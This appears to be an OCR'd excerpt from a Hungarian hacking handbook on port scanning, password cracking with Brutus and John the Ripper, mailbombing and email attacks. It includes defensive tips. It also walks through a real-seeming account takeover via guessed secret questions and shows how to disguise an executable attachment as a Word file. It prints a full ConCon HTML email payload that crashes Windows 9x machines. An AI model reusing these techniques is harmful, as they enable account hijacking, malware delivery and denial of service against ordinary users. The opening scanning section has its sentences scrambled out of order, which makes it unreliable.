lehetőleg gyorsan. a host visszajelzése pedig. Ha a szkenner ezeknél a kísérleteknél egy porttól feleletet kap. hogy a rendszergazdák ellenőrizzék rendszerük biztonságát. 6. Éppen ezért a szkenner multi-socket eljárást alkalmaz. mielőtt munkához látna. hanem a SYN-ACK megerősítés után egy elérhető sockettől RST-ACK-val rögtön megszakítják a kapcsolatot. A legismertebb szkennerek közé tartozik a Nessus és az nmap . ha nem érhető el a port. lehetségesek-e anonim loginek. Ezen a módon persze nagyon sokáig tartana minden kapcsolatot felépíteni és azután befejezni. és a kapcsolat létrejött. RST-ACK. illetve a kliens megpróbál teljes kapcsolatot felépíteni a host minden portjához. Az mindenesetre biztos. és hogy megkövetelik-e a hitelesítést a hálózati szolgáltatások. fejezetben. akkor az elérhetőnek számít. hogy nagyon gyorsan vezet eredményre. melyek engedik meg kapcsolat felépítését. akkor SYN-ACK. többek között arról. amelynek a célja TCP alapú szervizeket/szolgáltatásokat találni. Közben különböző információkat gyűjtenek. A szkenner egy TCP/IP csomagot küld SYN-flaggel a számítógépnek (a flagek [zászlók] speciális ismertetőjelek a csomag TCP-headerében). A következő magyarázatok feltételezik a közkedvelt protokollok alapismereteit.2 Szkennelési eljárások Egy rendszer szkennelésére különböző lehetőségek kínálkoznak. 6. de időközben már Windowshoz is kifejlesztették.1. különben nehezen érthetők az összefüggések.2 Félig nyitott TCP-szkennelés A félig nyitott szkennelésnél nem állítanak elő teljes kapcsolatot a hosthoz.2.2. hogy minden portot le lehet-e szkennelni. Hogy ezek közül melyiket választják. Ha a szkennelt számítógép biztonsági és felügyeleti státusza csekély. No persze nem a hagyományos értelemben vett szkennelésről van szó. mert nagyon feltűnő. 6. hogy minden időkeretet túllépne.A rések keresése 6.mindkettő a Linux alatt gyökerezik. a hacker pedig észrevétlen szeretne maradni. amelyek mellett a feladatot meg kell oldani. hogy Unix alatt csak az tud végrehajtani ilyen eljárást. az azoktól a feltételektől függ. Ezért minden rendszergazdának jól kell ismernie a szkennereket.1 Szkennelés teljes TCP-kapcsolattal Itt egy olyan szkennelési eljárásról van szó. hogy kitalálják. és nagy valószínűséggel a támadó IP-címe is beíródna a rendszer logfájljaiba. Ebben az esetben a szkenner ismét ACK-val válaszol. Ehhez minden fontos információ megtalálható a 3. Ennek az eljárásnak az előnye. Minden hacker elvégzi a portszkennelést a célrendszerén. ha elérhető. hogy egy rendszer minél több csatolófelületét. hogy milyen szolgáltatások futnak a rendszeren. illetve portját szólítják meg. Az előnye viszont.6 Szkennelés . akkor nem fogják észrevenni ezt a szkennelést. A portszkennek a támadók legfontosabb eszközei. és visszadják a rendszer válaszait. amelynél egyidejűleg nagyon sok kérdést tud feltenni. A szkennelés az egyik legfontosabb módszer egy rendszer gyenge pontjainak a felismerésére. A szkennerek kérdéseket küldenek a portoknak. A támadóknak azonban nem felel meg. hiszen e szó jelentés itt az. Ehhez a következőképpen járnak el: a szkenner. akinek root-jogai . A szkenner A szkenneléshez szükség van egy portszkennerre. A rendszer minden jogosultságával rendelkező rendszergazda teljes áttekintést szeretne kapni. Emellett a portszkennelés arra is szolgál. és kérdéses lenne.

A háttérben ismét egy bug áll: ha megpróbálunk egy portra írni. hogy találjanak egy hostot. Ennél az eljárásnál tehát minden portot kétszer szkennelnek. 6. amelynél csak azok a userek kapnak pozitív visszajelzést. 6. Tehát szkenneljük a portokat. hogy a fennálló kapcsolatot annak rendje és módja szerint bezárják. A szkennelendő portra egy TCP-csomagot küldenek egy FIN-csomaggal. hogy a hálózatokban az erre jogosult rendszeradminisztrátoron kívül senki se tudjon végrehajtani ilyen szkennelést alacsonyabb jogokkal.2. hogy milyen szervizek (FTP.2.5 UDP-lCMP-Port-Unreachable szkennelés Az UDP.6 UDP-Recvfrom-And-Write szkennelés Ellentétben a UDP-ICMP-PORT-UNREACH szkenneléssel. hogy melyik hostok elérhetők. Ráadásul csak Linux alatt működik. 6. Ennél a TCP-csomagok több kis csomagra fragmentálódnak. HTTP. Ezeket a szkenneléseket csak a rendszergazda tudja elvégezni. amelyek nem feltűnőek. ezért lehet a TCP-FIN szkennel könnyen kideríteni a nyitott portokat.2.2. Csak a lezárt port küld vissza egy üzenetet.7 ICMP-echo-scanning/ping-szkennelés A szkennelésnek ez a módja csak azt állapítja meg. 6. akik rootként vannak bejelentkezve. egyszer. Ez azt jelenti. A lezárt portok RSTcsomaggal válaszolnak a FIN-csomagra. Ha a számok valamelyike mögött van egy rendszer. amelyen a támadó a legkülönbözőbb szkennelésekkel réseket kereshet. a Microsoft operációs rendszereknél a TCP-implementációnak nincs ilyen fajta hibája. amely a számítógépen fut. illetve rendszererőforrásaitól függ. amit sajnos. a normál Error 111 . a UDP-Recvfrom-And-Write szkennelés egy normál módon bejelentkezett felhasználónak is lehetővé teszi. és a pontossága nagy mértékben a szkennelt számítógép kihasználtságától. és gyakran megbízhatatlan.3 TCP-FIN-Scan A TCP-FIN szkennelést a Unix alatti TCP-implementációk többségének egy hibája (bug) teszi lehetővé. a támadó utánanéz a megfelelő kihasználási lehetőségeknek. Ezek a „letapogatások" azonban csak Unix alatt működnek. 6. akik rootként vannak bejelentkezve.Connection refused üzenet helyett. HTTPS. mielőtt még egy megtalált rendszeren el lehetne indítani a tulajdonképpeni portszkennelést. 6. Telnet. és másodszor. Ez gondoskodik ugyanis arról. akkor egy portlista segítségével lehet áttekintést kapni arról. Ez az operációs rendszernél kezdődik. illetve darabolódnak. hiszen system admin jogok kellenek hozzá.8 A nyitott portok csak a kezdetet jelentik Ha találtatott egy rendszer nyitott portokkal. nem látunk. hogy „érdekes" jelzéseket kapjon. a nyitottak ezt nem teszik.4 Fragmentált szkennelés A fragmentált szkennelés a TCP-szkennelések egy további módja. A szkennelésnek ez a módja azok közé a csekély számú eljárások közé tartozik. akkor többnyire ezt az üzenetet kapjuk: Error 13 . .13-as hibánál a port le van zárva. amelyik a UDP-ICMP-PORT-UNREACH szkennelésre ICMP-PORT-UNREACH választ adott (amiről normál felhasználóként nem értesülünk). A FIN-csomagokat arra használják. Ezen a módon lehet meggyőződni arról. hogy a port nem elérhető. nem igazolja vissza a fogadást. Megvan tehát a cél. stb. más protokollokkal ellentétben.2. hogy a számítógép kiadjon egy választ. az ICMP-ECHO-REPLY csomaggal válaszol. Természetesen ez az eljárás is nagyon időigényes. hogy nem fogja-e egy tűzfal felfedezni a portszkennelést. megkapják az ICMP PORT UNREACH üzeneteket.2. hogy milyen portok nyitottak és milyen operációs rendszer van telepítve. Aszerint. hogy egy ICMP echo scanning/ping szkennelést hajtanak végre. és várunk egy UDP-ICMP-PORT-UNREACH üzenetre.vannak. hogy mégis kapjunk informatív visszajelzést . A támadók most hozzákezdenének információkat gyűjteni a célrendszerről.Try Again. és azok a felhasználók.) futnak a rendszeren. Ehhez egy ICMP-ECHOcsomagot vagy egyszerűen egy pinget küldenek kölönböző IP-címekre. A szkennelésnek ez a módja nagyon hosszadalmas.

illetve naplóztatni a szkenneléseket. ha valaki például egy FTP-szervert működtet a rendszerén. vagy portscan detektorok. Tehát minden szolgáltatást. már akkor is. port elérhetőségét (lásd.9 A portszkennelés elleni védelem A szkennelés többnyire az első lépés. mint például a BlackICE. vagy egy csatlakoztatott hálózat miatt biztosítania kell a 139. amelyet a betörők végrehajtanak. amelyek nélkül a betörés lehetetlen volna. Naplóz a Norton Internet Security A tűzfalaknak olyan protokoll-funkcióik vannak. amint TCP-kapcsolatok érkeznek be. ha a szkennelés nem talál nyitott portokat. hogy ne kínáljunk támadási felületet. Ezen keresztül számos fontos információt begyűjthetnek.6. hogy megtalálják és analizálják a célrendszerüket. és megpróbálkoznak egy portra kapcsolódni. mint amilyen a Norton Internet Security. A legjobb védelem. Ez azonban többnyire nehezen kivitelezhető. hogy figyelmeztető üzenetet küldjenek. Ezért fontos védekezni a portszkennelés ellen. amelyek feljegyzik a portszkenneket. A tűzfalakat arra is be lehet állítani. a Windows-megosztásokat a Windows-rendszerek gyenge pontjairól szóló fejezetben). hogy egy rendszert szkenneljen. ameddig lehetséges. Itt a tűzfalak segítenek.2. hogy azonosítani lehessen a lehetséges támadót. . inaktívan kellene tartani. Természetesen nagyon nehéz valakit visszatartani attól. mielőtt még hozzákezdene a tulajdonképpeni támadáshoz.

3 Hackelt security-site .4.jelszófeltöréssel ez is lehetséges Mire kell ügyelni a felhasználói oldalról? A jelszófeltörők 7.4.3.3 Incremental mód 7.1 7.2 A szólista módszer 7.4. fejezet .4 Jelszavak megfejtése a John the Ripperrel 7.4.5 A John legfontosabb parancsai 7.7.6 A jelszófájl Single Mode .4.3.2 7.4.1 Ismert felhasználói nevek jetszavainak a kitalálása 7.1 7.4 External mód 7.2 Beállítások áttekintése 7.Tartalom 7.

A legfontosabb azonban az. amely egy lista segítségével minden lehetséges variációt megjátszik. Ezért itt csak a valóban fontos információkat szeretnénk bemutatni.de) szolgáltatónál szerepelt kontaktcímként.1 Hackelt security-site jelszófeltöréssel ez is lehetséges Egy ismert példa a th-security „átváltozása" (deface) volt.kulcsszó: email-cím.denic. megváltoztatta a jelszót. a www. így két lehetőség adódott .thsecurity. az a fejezet 7. egy ismert biztonsági és trójai információs oldal. hogy milyen névről van szó. mert a legtöbb felhasználó nagyon lazán veszi a jelszó kiválasztását. és látta. És nézzenek oda: ez megint telitalálatnak bizonyult. A hacker a felhasználó születési dátumával kezdett. hamar rájött.az első: várni pár napot egy mail-re a szolgáltatótól. A támadó először megnézte a GMX-titkos kérdést. amelyekre a Social Enineeringhez szükség van. A hacker most a webtárhely szolgáltatójától kapott mail-eket kereste. A jelszavak kiderítésére. hogy egy jelszó ne legyen túl egyszerű. mivel az interneten és a helyi számítógépeken is gyakran védik jelszavakkal a fájlokat a jogosulatlan hozzáférések ellen. De nem voltak mail-ek a szolgáltatótól.de volt. amelyet egy m \ r3nda nevű hacker kinézett magának. illetve feltörésére különböző lehetőségek vannak. Tehát a hackernek más eszközökhöz kellett folyamodnia. hihetetlen. mert ezekben szerepelt az ügyfélszám. amelyeket senkinek sem adnánk meg önként. és megváltoztatná a kontaktcímét. amelyben a főnökünk keresztnevét kérdezik . Kutatás közben megállapítot- Itt egy honlap volt .haennle@gmx. hogy a Pureteckel „elfelejtett" jelszavakat lehessen a kontaktcímre küldetni. Itt a következő történt. amelyet a GMX-adatokból megtudott. Természetesen a jelszófeltörők elleni legjobb védelem. amire szüksége volt ahhoz. amelyen semmiféle scripthibát vagy szerverhibát nem lehetett találni.de és pegasuss.puretec. és a jelszóválasztás biztonságát a középpontba állítani. Az áldozat. Az első címet kontaktcímként adta meg a weboldalon. A klasszikus jelszótörő egy olyan program. hogy a kérdés mindkét postafióknál így hangzott: Mi a keresztnevem? Az oldalon megadott kontaktcímből. mert a Puretec általában havonta egyszer mail-ben elküldi a számlainformációkat.de.flieger@dmx. hogy ismeretlenek olyan információkat csaljanak ki tőlünk.7 Jelszófeltörés ta..3 pontjából derül ki. amellyel a fontos adatok jelszó-tulajdonosoktól való megszerzését jelölik. A jelszófeltörésről oldalakat lehetne írni. amivel ilyenkor eljárnak. Ez történhet mondjuk egy telefonhívással. Hogy hogyan is működnek ezek a programok.de) és a Puretec (www. A hackereknek változatlanul az okos jelszavas védelem jelenti az egyik legnagyobb akadályt. Hogy ezek után mit csinált az oldalból? íme az eredmény: Ez a fejezet a jelszavak biztonságosságát tárgyalja. De ez biztosan feltűnne a felhasználónak.de (a címeket az adatvédelem miatt megváltoztattuk). A kreativitás. Tehát ne hagyjuk. Az egyik legfontosabb a Social Engineering. hogy a webmesternek két GMX-fiókja van: tobias. Tehát fogta Tobias-t. ahol a valódi tulajdonos a nevétől kezdve a telefonszámáig tulajdonképpen minden adatot hátrahagyott. Most egy kicsit körülnézett a GMX felhasználói menüben. és máris büszke tulajdonosa lett egy GMX-accountnak.haennle@gmx. tehát tobias. 7. a második a Denic-nél (www. a „biztos jelszó" sem fog kimaradni. A másik lehetőség: a jó szerencsében bízva egyszerűen megpróbálkozni néhány jelszóval.

7. POP3. E programok nem tesznek mást. és szükség szerint szólistákat is be leA Brutus program: minden beállítás egy lapon Teljesen értelmetlen a jelszóhasználat. amelyek jelszavakat fednek fel. • egy cetlit teszünk a billentyűzet alá vagy a monitorra. Ezért a rosszul választott jelszavak kihasználása a hackerek egyik legjobban elterjedt támadófegyvere. • ne legyen szabványos. kml34Hs9. a Brute Force-ot használják. • vegyesen kis. A jó jelszavak • több mint tíz karakterből. ha elfelejtette. NetBios stb. A jelszót kettő-négy hetente cserélni kell. Telnet. tehát ne legyen „hhaalloo". hogy a felhasználónak lehetővé tegyék. Ezzel a fogással meghiúsíthatjuk a korábban kikémlelt jelszó felhasználását. • semmi duplázás. ha • mindenütt ugyanazt a jelszót használjuk. az alkalmatlan jelszó révén. A Target mezőbe be kell írni a kikémlelendő fél URL-jét vagy IP-címét. A titkos kérdések legyenek titkosak Az interneten a különböző oldalak biztonságra ügyelő szolgáltatói jelszókérdések vagy titkos kérdések megadását kínálják. pl. • alfanumerikus karaktersorból. Egy példa az ilyesfajta programra a Brutus. megváltoztatni a jelszavát. amelyek benne lehetnek a jelszólistákban vagy a szótárakban. A jelszót a legritkább esetben fejtik vissza. 7. ehelyett egy névről nagyon jól ismert eljárást. amíg megtalálják az igazit. Az internetjelszavak minden fajtájához szívesen használják. és ráírjuk a jelszót. A Brutus jelszófeltörő internetaccountok valamennyi variánsához (FTP. Ezután ki lehet választani a támadás fajtáját.és nagybetűkből állnak. A jelszavak megadásánál a következő alapszabályokat kellene betartani: • ne legyen öt karakternél rövidebb. . HTTP. Gyakran lehet ilyen kérdésekkel találkozni: „Mi a hideg ellentéte?" Ez természetesen rossz választás. A Brute Force annyit jelent: nyers erőszak.2 Mire kell ügyelni a felhasználói oldalról? A legtöbb felhasználó nem túl ötletes egy értelmes jelszó kitalálásánál. mert így minden támadónak lehetővé tesszük a jelszavunk tetszés szerinti megváltozatását. mint nagyon nagy sebességgel próbálják ki az egyik lehetséges jelszót a másik után. • semmi születési dátum és hasonlók.3 A jelszófeltörők A jelszófeltörők olyan programok. • a jelszó egy fájlban van mentve a gépen.Ez bizony egy nagyon jó példa arra. hogy hogyan válik lehetségessé egy „deface" a rosszul megválasztott titkos kérdés.). hogy ki kerüljék az alkalmazott biztonsági intézkedéseket. • ne legyenek olyan szavak.

Port: a port megadása. incremental. A John the Ripper szerény felhasználói felülete 7. hogy a jelszavakat eltávolítja a passwd fájlból. 7. ha a jelszó a listán van.). akkor visszafejtve is egyezniük kell.1 Single Mode Ebben a módban a John megpróbálja a jelszófájlban tárolt GECOSinformációkat (General Electric Comprehensive Operating System). SMB (NetBOIS) stb. a program ennél az eljárásnál csak egy user névvel próbálkozik.4 Jelszavak megfejtése a John the Ripperrel A John the Ripper egy jelszófeltörő.4. Connection: meg lehet adni. ha elfelejtettük a fiók-jelszavunkat. ezért a program egyes verziói különböző processzorokra optimalizáltak. hogy vissza lehessen követni a támadót.3. pl: lol@gmx. HTTP. igencsak megrövidítik a feltörést. Use Username: kiválasztva. A DES-kódolások felhasználásának egyik területét a Unix-jelszavak jelentik. hogyan történjen a feltörés. Timeout: megadható. combo-listával vagy Brute Force-szal. POP3. és az eredményt összehasonlítja a megfejtendő jelszóval. Így lenne ez például akkor is. Itt lehet egy szólistát betölteni.1 Ismert felhasználói nevek jelszavainak a kitalálása Mint már a neve is mutatja. Type: itt lehet kiválasztani a cél típusát. amelyek. 7. itt lehet kiválasztani. A John működése azon alapul. Method: HEAD KeepAlive: megjelölve. Use Proxy: nincs kiválasztva. a POP3 vagy FTP-account van. Az idő. Ha a jelszavak kódolt állapotban egyeznek. Egy további.3. hogy milyen gyakran létesítsen kapcsolatot a program. FTP-nél a 21-es. FTP. aszerint. 7. amelyet a Brutus mellé adnak.. mert mindkettőnél ugyanazt a kódolási eljárást (DES) alkalmazták. szólista. amely DES-sel (Data Encryption Standard) kódolt jelszavakat tud dekódolni. a Brutus itt lehetővé teszi egy proxy bejegyzését. amelyeket a Brutus mellékel. hogy mennyi idő múlva szakítsa meg a program a kapcsolatot. Pass Mode: szólista. Még ha a passwd fájlban az adatok „árnyékolva" is vannak (ez a bizonyos shadowing az újabb Linux/Unix verziók biztonsági intézkedése. a . Single User: kiválasztva User ID: usernév (pl. Fercsi stb. jelszóként felhasználni. Jóska. Itt lehet egy névlistát választani különböző user nevekből. amelyet előre meg lehet adni.het tölteni. Telnet. a rendelkezésre álló processzor sebességétől függ. telefonszám stb. external). hogy a megadott jelszólehetőségeket például DES-sel kódolja. hogy milyen módban indult el (single. mert az már ismert. és helyette a shadow-fájlban tárolja). amely úgy működik. azaz a userek személyes adatait.txt.2 Beállítások áttekintésére Target: a host URL-je vagy IP-je. amelyen pl. Pass Fik: words. HTTP esetén a 80-as port. de nincs meg a hozzá tartozó jelszó. a támadásokhoz hasznos tulajdonság egy beépített proxy. amelyre John the Rippernek szüksége van a jelszavak visszafejtéséhez. például név.net. amely megakadályozza. Lehet szólistával.

a LIST.4. a USERNAME: PASSWORD séma szerint kell tárolni. ezért nem szabad alábecsülni. mert minden rendkelkezésre álló információt fel lehet használni. A jelszavak „árnyékolva" sem lehetnek. John fájlnév John -show Ez a parancs először single. végül incremental módban futtatja le a Johnt. a szólista német részét ebben az esetben el lehet hagyni. akkor a GECOS-információknak és a user-könyvtár elérési útvonalának is mögötte kell állnia ( p l : john:OozDCtCCAa/lM:11202:0:99999:7:0:). Ha a single módot kell használni. csak arra kell figyelni. Minden létező jelszót. Hogy hány ilyen pár van a fájlban tárolva. mert a John egy kicsikét gyorsabban dolgozik. Ez a parancs incremental módban indítja a Johnt. ábécé-sorrendbe rendezik. Arra is ügyelni kell. És éppen ez adja ennek az eljárásnak a erősségét: mivel valószínűtlen. Ezeket kettősponttal elválasztva. 7. Erre a parancsra mutatja meg a program a megfejtett jelszavakat. Ez a mód természetesen csak akkor hatékony.2 A szólista módszer Ennek a módszernek a hatékonysága teljes mértékben a felhasznált szólista méretétől és főleg a minőségétől függ. 7. 7. mert teljes mértékben konfigurálni kell. mégpedig úgy.4. 7. ha a felhasználók személyes információikat használják jelszóként.4. például több listát összefűznek.4. A John the Ripper legfontosabb parancsainak az áttekintése John -single John -i John -w:aszólistaneve John -e:MODE 7. EXTERNAL: előtt definiált MODE tulajdonságokkal.5 A John legfontosabb parancsai Parancs Leírás Ez a parancs single módban indítja a Johnt. A john parancs kilistáz minden lehetséges paramétert. Azt mindenesetre figyelembe kell venni.GECOS-információk azonban még mindig a passwd fájlban vannak. kódolva=john:GjstuOeYjOEhc). vagy eltávolítják a dupla bejegyzéseket). hogy minden lehetséges kombinációt ellenőriz. számokból vagy kombinációkból áll. Minden parancs után meg kell még adni a jelszófájlt is. hogy a szükséges idő (a processzor teljesítményétől. hogy egy sorban mindig csak egy USERNAME:PASSWORD pár legyen. hanem normál kódolt állapotban kell lenniük (pl: árnyékolva= john:x vagy john:* . az nem túl lényeges. a jelszó hosszától és a jelszóban használt karakterektől függően) nagyon hosszú is lehet. Ennek a módnak a hatékonysága a jelszófájl tartalmazta felhasználók számával növekszik. . hogy egy ausztráliai szerver passwd fájlja német jelszavakat tartalmaz.4 External mód Ez a mód inkább tapasztalt felhasználóknak való. Ezt az eljárást Brute Force-nak is nevezik.6 A jelszófájl Ennek a fájlnak tartalmaznia kell a megfejtendő jelszavakat a hozzájuk tartozó felhasználó-nevekkel. és ezzel a siker valószínűségét növelni. hogy a szólista ábécé-sorrendben legyen. vissza tud fejteni úgy. Ez a parancs szólista módban indítja a Johnt. ha az egymás után következő szavak vagy karaktersorozatok nem különböznek túlzottan egymástól (vannak programok.ill. mert minden felhasználó GECOS-információját az összes többinél is kipróbálja jelszóként. Ez a parancs external módban indítja a Johnt. amelyek a szólisták kezelésében segítenek. Ebben az esetben az Unshadow program segít. hogy minden sorban csak egyetlen karakterfüzér legyen. így lehet szerver. ezért a jelszavakat és a GECOS-információkat megint csak egyetlen fájl tartalmazza.3 Incremental mód Ez a John leghatalmasabb üzemmódja. függetlenül attól. különleges karakterekből. majd szólista. adminspecifikus szólistákat előállítani. Ez a módszer egyben nagyon gyors is. hogy betűkből. A szólistát úgy kell felépíteni. hogy összevezeti a passwd fájlt és a shadow fájlt.4.

2. fejezet .1.1 E-mail-támadások 8.3 AConConbug 8.8.2 A fájlmelléklet kitömése 8.2 Milyen biztonsági rések vannak? .túlcsordul a postafiók 8.2.Tartalom 8.1.praktikus és veszélyes 8.biztonsági kockázat? 8.1 Mailbombák .2 ICQ .1 Az ICQ .1.

Ennek természetesen az a következménye. E-mail-bombázó Arzytól szánthatják. Ezt ugyanis. hogy a címzett postafiókja hamar túllépi a maximális kapacitását. hogy a feladó adatait ellenőrizni lehessen.8 Támadások az internet-felhasználók ellen Az internetet használók száma folyamatosan növekszik. az a mailbombázók által gyakran használt SMTP és Telnet internetprotokollok (lásd az Alapok fejezetet) felépítésén múlik. és nem tud több mail-t fogadni. ezeket az adott témának szentelt fejezetek tárgyalják.választás szerint hamis feladócímet is meg tudnak adni. Egy ilyen támadás azonban akár pénzügyileg is érinthet kisebb cégeket. mivel a mailbox a támadás miatt túltelítődik. hogy a mailbomba-támadások mögött mennyire van stratégia.1 Mailbombák .1 E-mail-támadások Az e-mailek a legfontosabb kommunikációs bázist jelentik az interneten. ezt pedig a hackerek kihasználják a rendszerek megtámadásához. A mailbombázáshoz a támadók számos programból választhatnak. tehát csak egyszerű szöveget szállítanak. Ebben a tényben azonban veszélyek is rejlenek. hogy valaki hamis feladócímet adjon meg! A mailbombázók sajátos képességei tehát nemcsak abban nyilvánulnak meg.lehet.és drága . Az interneteléréssel azonban növekednek azok a veszélyek. Egy egyedi felhasználónak főleg az idejét rabolhatják a bombázással. amelyek sok felhasználóban nem is tudatosulnak. Nehéz felmérni.1. aki nem kapja meg a megrendelés-maileket. sőt még arra is van mód. amelyeknek fontos kommunikációs eszközt jelent az internet. hogy egy fontos mail-re vár.és víruslehetőségekről itt már nem beszélünk. Ezek az adatátviteli protokollok az ASCII karakterkészletre korlátozzák a tartalmukat. A legtöbbek életéből már nem maradhat ki ez a médium. S bizony roppant időrabló ténykedés eltávolítani a többnyire különösebb tartalom nélküli mail-ek százait. és a tartalmak is mind vonzóbbakká válnak. Kiderül. hogyan és milyen változatokban hajtanak végre támadásokat felhasználók ellen. inkább csak idegölők és zavarók. A támadó anonim marad Hogy a mailbomba-támadások áldozatai nem tudnak közvetlenül a tettesekre támadni. Itt elsősorban az e-mailek és az ICQ biztonsági kockázatairól lesz szó.túlcsordul a postafiók A mailbombák nem jelentenek közveden veszélyt az internet-használók adataira vagy saját számítógéprendszereikre. Ez a fejezet az internet-használat veszélyeinek és kockázatainak reálisabb felbecsülésében próbál segíteni. amelyeknek a saját PC-nk vagy akár a hálózat is ki van téve. 8. vagy . Ugyanis elég időigényes . 8. ha tudják. Ennek alapján nem nyújtanak lehetőséget arra. akkor bosz- . hogy szinte egyidejűleg hallatlanul nagy számú mail-t tudnak küldeni a kívánt címre. Képzeljük csak el egy online bolt üzemeltetőjének a helyzetét. A különböző trójai. hogy anonimek maradnak. egyre újabb és újabb szolgáltatásokat kínálnak a számukra. hanem abban is. ha az embernek hirtelen 5000 nem kívánt mail-t kell törölni a postafiókjából. mert mailbomba-támadás áldozata lett. a szerver vissza fogja utasítani.

Ezért gyakran egy trükkhöz folyamodnak.EXE. Ez megakadályozza. Általánosságban érvényes.így működnek a mailbombák Ahhoz. Ezt egyébként azért teszik. a mailbombázó programoknak több szerverrendszert is meg kell adni.microsoft. A csatolt fájl. az úgynevezett spam-et.1. és feltelepül az esetleg hozzáfűzött vírus vagy trójai. felhasználói biztosan jól ismerik az előbb említett mailreklámot.COM. amit közvetlenül is meg lehet nyitni az Outlookból. postásként fognak működni. s a további mail-akciókat zárolni lehetne erről a szerverről! Az utóbbi időben egyre több mailbomba-támadás összpontosít cégekre. 8. Figyelmeztető üzenet az Outlooktól.BAT nevű mail-mellékletek veszélyesek lehetnek. így a felhasználó feltételezheti. *. megkérdőjelezhető fájlcsatolásoknál Mailbomba-védelem A német online szolgáltatók. a következőképpen néz ki: Profil. hogy előzőleg a merevlemezre kellene menteni. Természetesen ebben az esetben azonnal elindul a megfelelő program. hogy csak egy hagyományos Word-dokumentumról van szó. és a munkát felosszák több különböző szerver között.egy mail kipufferolt fájlmelléklete .doc-ot mutatja. hogy a nyilvános ismeretterjesztés hatására sok felhasználó már tudja. Ráadásul egy ilyen tranzakció egyeden szerveren keresztül talán túl feltűnő lenne. A felhasználó tehát figyeljen a megfelelő ikonra! Persze az elszánt hacker az olyan programokkal. amelyek. hogy álcázzák a csatolt fájlt. amelyek agresszív reklámjaikkal tűnnek fel az interneten.com/ címen egy Outlook-frissítést is kínál. Ezáltal az egyes mail-szerverek túlterhelésének a kockázata is csökken. hogy felgyorsítsák az akár 10 ezer mail továbbítását. hogy az elképesztő tömegű mail egyáltalán továbbítódjon a felhasználóhoz.2 A fájlmelléklet kitömése Vírusok és trójaik küldésénél a hackerek állandóan szembesülnek azzal a problémával. hogy az *. mint a Sub7 (lásd a trójaiakról szóló fejezetet). az akaratuk ellenére. még Word-ikont is tud varázsolni. *. a merevlemezre mentve. anélkül. amely még a mail-hez csatolt fájlok futtatása előtt figyelmeztetést küld a gyanús fájloknál. hogy a címzetteknek továbbítsák a mail-eket. hogy először mentsük merevlemezre és ellenőriztessük vírusvizsgálóval az ismeretlen forrásból származó mail-ek csatolt fájljait. Ezen kívül a Microsoft a http://windowsupdate. mint az AOL vagy a GMX. Ártatlannak tűnik . A szervezett mailbomba-akciók ezeknek a cégeknek a mail-postafiókjaira gyakran sikeresnek bizonyultak! Ezért a legtöbb mailszolgáltató ügyfél-postafiókjain ki lehet választani az antí-spam opciót. A csatolt fájlok elleni védelem A fent bemutatott fájlmellékletet nyilvánvalóan nem a Word dokumentum ikonja jelöli.doc exe A hosszúsága miatt (amit az üres karakterek okoznak) az Outlook csak a Profil.

de=20 width=3D617></CENTER><BR><BR><BR> <CENTER> <Hl>Elfuthatsz. Az is ismert. font-family: "Tempus Sans ITC". hogy ennek a hibának a többszöri fellépése kárt okozhat a Windows kernelben. font-family: "Tempus Sans ITC". font-size: 20pt.=20 } hl { color: FF3300. amelyek például így nézhetnek ki: <!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN"> <HTML> <HEAD> <META content=3Dtext/html. OL. font-weight: regular. "Arial".3 AConCon bug A csatolt fájlok mellett a mail-éknek is lehet veszélyes tartalmuk.8. Egy példa erre a híres Windows ConCon bug. amely a foglalt eszköznevek meghívására vonatkozik.</DIV> <CENTER><IMG align=3Dcenter alt=3D"Elfuthatsz. "Comic Sans MS". DIR. PRE.72. A ConCon „nagy kék halált" okoz. "Arial".3110. BLOCKQUOTE. de el nem menekülhetsz=20 előlem!<TOPMARGIN=3D1 50></H1Yó></CENTER><BR><CENTER> <IMG src= "\C: \Con \Con. DD. aminek az a következménye.1. BR. ADDRESS. Ez veszélyes lehet a nem mentett adatok miatt. P. font-family: "Tempus Sans ITC".gif> <P>Üzenetet ide beilleszteni. A ConCon mail-ékben terjed beágyazott HTML-fájlokon keresztül.charset=3Diso-8859-l = http-equiv=3DContent-Type><BASE=20 href=3Dftle://C: \Con \Con \> <STYLE> <'body." height=3D116=20 src=3Dcid:005001bfc591$8d8c9fOO$23b02fd5@lol. Ez a Windows 95/98/98 SE Windows kernelének egy hibájára épül. } ? { </STYLE> <META content=3D'"MSHTML 4. "Comic Sans MS". font-weight: regular. "Comic Sans MS". font-weight: regular. font-size: 24pt.7"! name=3DGENERATOR> </HEAD> <BODYbgColor=3D#99ccffleftMargin=3D30topMargin=3D5> <DIV>&nbsp.=20 } hl . DT.telekabel.</P></CENTER></BODY></HTML> ConCon-mailnézet egy erre a búgra rezisztens Windows 2000rendszeren color: FF3300. hogy újra kell installálni az operációs rendszert. font-size: 30pt. = LI { color: FF3300. MENU. "Ariar. és újra kell indítani a PC-t. DIV. UL.

Az ICQ minden felhasználója egy saját számot kap. minden alkalommal elindul ez a fájl. Megjegyzés: A mail-támadásoktól eltekintve a számítógép Indítópult mappájába is előszeretettel másolnak ConCon-fájlt. a választék az Online. de az interneten egyre több program található. és a kérdésre. Tulajdonképpen a címünkhöz vagy az IP-nkhez hasonlítható. és a gép lefagy. Az ICQ kiszolgálóelemei és egy Sub7 szerver -üzenet Védelem a ConCon ellen A http://www. vagy ki akarja. A kliense a legkülönbözőbb platformokon megtalálható. hogy kinek adnak engedélyt és kinek nem a kontaktlistájukhoz. mert túl veszélyes". hogy ez mit jelent). 2000b ICQ-pager-értesítés egy Sub7 szerveren ICQ message-window 8. miután nagyon kényelmes és felhasználóbarát. Manapság már majdnem 150 millió szám létezik. Az ICQ-kliensen egy session közben megváltoztathatjuk a saját státuszunkat. 3. az IRC (InternetRelayChat) mellett az internet egyik legtöbbet használt chatrendszerévé fejlődött. hogy ki van onlineban. az e-mail címét vagy a UIN-t.2 ICQ . mert a felhasználókat a UIN-on keresztül tudják más felhasználók megtalálni és azonosítani. amelyek kikerülik ezeket a beállításokat. A státuszon lehet látni.1 Az ICQ .4. Az IP kiadása ugyan különböző beállításokkal megakadályozható (a 99b verziótól egy másikat is lehet megtévesztésként mutatni). amelyeknél a támadó üzenetek sokaságával bombázza az áldozatot (lásd ebben a fejezetben.microsoft. sőt MacOS-hoz és BeOS-hoz is van ilyen. az Away és az Invisible. hogy a számítógép lefagyjon. és kapcsolatba léphetünk vele. Ezeket a hálóról származó eszközökkel lehet végrehajtani.asp?ReleaseID=193 89 címen a Microsofttól letölthető egy patch a bug kijavításához. mint magán az ICQnetworkön. 8. vagy egyszerűen a UIN. és a támadóknak szállítják a megfelelő információkat. Windows ICQ Client v. és újra kelljen indítani. amelyek 